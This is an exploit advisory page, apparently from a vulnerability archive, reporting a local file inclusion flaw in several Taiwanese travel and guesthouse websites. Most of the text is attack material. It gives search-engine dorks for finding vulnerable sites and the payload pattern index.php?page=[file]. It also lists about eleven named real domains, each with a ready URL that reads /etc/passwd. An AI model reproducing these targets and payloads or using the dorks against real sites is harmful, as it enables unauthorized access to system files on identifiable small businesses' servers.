Taiwanese Travel Websites Local File Inclusion

2020.05.28
id Xmall75 (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"COPYRIGHT" inurl:?page=regulation.php

# Exploit Title : Taiwanese Travel Websites - Local File Inclusion # Author : Xmall75 # Vendor Homepage : yltravel.com.tw, hutravel.com.tw, tttravel.com.tw # Date : 28 / 05 / 2020 # Tested on : Windows # Dork : intext:COPYRIGHT © 宜蘭民宿旅遊網 intext:COPYRIGHT © 花蓮民宿旅遊網 intext:"COPYRIGHT" inurl:?page=regulation.php # Payload : www.site.com/index.php?page=[file] # Demo : handays888.com/index.php?page=/etc/passwd www.tenderyard.com.tw/index.php?page=/etc/passwd www.4seasonsbnb.com/index.php?page=/etc/passwd happywings.com.tw/index.php?page=/etc/passwd www.sleepillowell.com.tw/index.php?page=/etc/passwd loveback.com.tw/index.php?page=/etc/passwd isa383.com/index.php?page=/etc/passwd dragonbnb.com/index.php?page=/etc/passwd greenozland.com/index.php?page=/etc/passwd 1955kids.com/index.php?page=/etc/passwd www.windblown.idv.tw/index.php?page=/etc/passwd # xmall75.id@gmail.com


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top